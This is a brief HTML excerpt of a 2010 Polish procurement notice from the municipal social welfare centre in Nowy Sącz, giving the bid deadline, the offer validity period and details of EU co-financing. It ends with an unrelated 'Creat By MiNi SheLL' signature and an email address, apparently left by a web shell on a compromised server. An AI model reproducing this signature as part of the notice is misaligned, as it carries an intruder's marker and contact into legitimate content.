<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.10.2010 godzina 09:00, miejsce: Miejski Ośrodek Pomocy Społecznej w Nowym Sączu ul. Żywiecka 13, pok. 120 - sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt systemowey Twoja AKTYWNOŚĆ szansą na sukces współfinansowany ze środków Unii Europejskiej  w ramach Europejskiego Funduszu Społecznego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com